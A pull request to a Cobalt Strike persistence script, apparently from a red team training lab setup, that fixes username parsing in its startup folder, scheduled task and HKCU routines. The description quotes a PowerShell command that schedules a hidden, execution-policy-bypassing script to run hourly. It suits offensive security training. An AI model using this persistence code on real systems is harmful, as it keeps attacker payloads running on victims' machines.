### PR TITLE
Username can contain an tailing asterisk that gets included in the upload path

### DIFF
--- a/CobaltStrike/persistence.cna
+++ b/CobaltStrike/persistence.cna
@@ -28,7 +28,7 @@ sub startup_folder
 
         blog2($bid, "Tasked Beacon to install Startup Persistence using " . listener_describe($1));
 
-        $username = binfo($bid[0], "user");
+        $username = split(" ", binfo($bid[0], "user"))[0];
         $artifact = artifact_stager($1, "powershell", "x64");
         $comp = powershell_compress($artifact);
         $cmd = powershell_command($comp, false);
@@ -51,7 +51,7 @@ sub scheduled_task
 
         blog2($bid, "Tasked Beacon to install Scheduled Task Persistence using " . listener_describe($listener));
 
-        $username = binfo($bid[0], "user");
+        $username = split(" ", binfo($bid[0], "user"))[0];
         $artifact = artifact_stager($listener, "powershell", "x64");
         $comp = powershell_compress($artifact);
         $filename = get_random_filename();
@@ -83,7 +83,7 @@ sub hkcu_persistence
 
         blog2($bid, "Tasked Beacon to install HKCU Persistence using " . listener_describe($1));
 
-        $username = binfo($bid[0], "user");
+        $username = split(" ", binfo($bid[0], "user"))[0];
         $artifact = artifact_stager($1, "exe", "x64");
         $filename = get_random_filename();
 


### PR DESCRIPTION
The username is extracted with the following snippet:

https://github.com/ZeroPointSecurity/RTOVMSetup/blob/d2b2c5be51f05fc9b06df6a691ef85cab9d27117/CobaltStrike/persistence.cna#L54

Problem with that is, that sometimes CS is adding a tailing asterisk to the username and this gets copy into the following command:

https://github.com/ZeroPointSecurity/RTOVMSetup/blob/d2b2c5be51f05fc9b06df6a691ef85cab9d27117/CobaltStrike/persistence.cna#L58

This results in a path `C:\Users\test *\AppData\Local\Temp\svnfjury.ps1` that definitely does not exist:

```
New-ScheduledTaskTrigger -Once -At (Get-Date).AddMinutes(1) -RepetitionInterval (New-TimeSpan -Hours 1) -RepetitionDuration (New-TimeSpan -Days 30); $action = New-ScheduledTaskAction -Execute "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Argument "-Sta -Nop -Window Hidden -Exec Bypass -File C:\Users\test *\AppData\Local\Temp\svnfjury.ps1 " -WorkingDirectory "C:\Windows\System32";
```

Therefore, if the username contains a space it need to be removed first.